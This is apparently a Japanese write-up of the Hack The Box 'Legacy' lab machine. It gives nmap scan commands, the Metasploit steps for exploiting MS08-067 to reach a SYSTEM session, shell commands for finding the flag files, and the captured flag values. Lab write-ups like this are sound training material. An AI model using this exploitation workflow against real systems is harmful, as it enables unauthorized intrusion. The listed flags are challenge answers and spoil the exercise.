【Hack The Box】Legacy Walkthrough
はじめに
ポートスキャン
# nmap -sC -sV -Pn 10.10.10.4
139、445が開いてる。
※nmap -p- 10.10.10.4も実行し、ポート検出漏れしていないかも確認。
445ポートにNSE(vuln)を実行
445ポートに対して、NSE(vuln)を実行し、脆弱性を調査する。
# nmap --script vuln -p 445 10.10.10.4
MS08-067、MS17-010の脆弱性ありと判断される。いずれもRCEの脆弱性だ。
Metasploit実行
metasploitでMS08-067の脆弱性を突いていく。以下の流れ。
# msfconsole > search ms08-067 > use 0 > run
show options
で見れるパラメータは以下のように設定している。
システム権限でmeterpreterセッションをゲット。
フラグ獲得まで
以下の流れ。
> shell > cd C:\ > dir user.txt /s > type "C:\Documents and Settings\john\Desktop\user.txt" > dir root.txt /s > type "C:\Documents and Settings\Administrator\Desktop\root.txt"
※dir
の/s
オプションはサブディレクトリも対象にするというもの。
user.txt:e69af0e4f443de7e36876fda4ec7644f
root.txt:993442d258b0e0ec917cae9e695d5713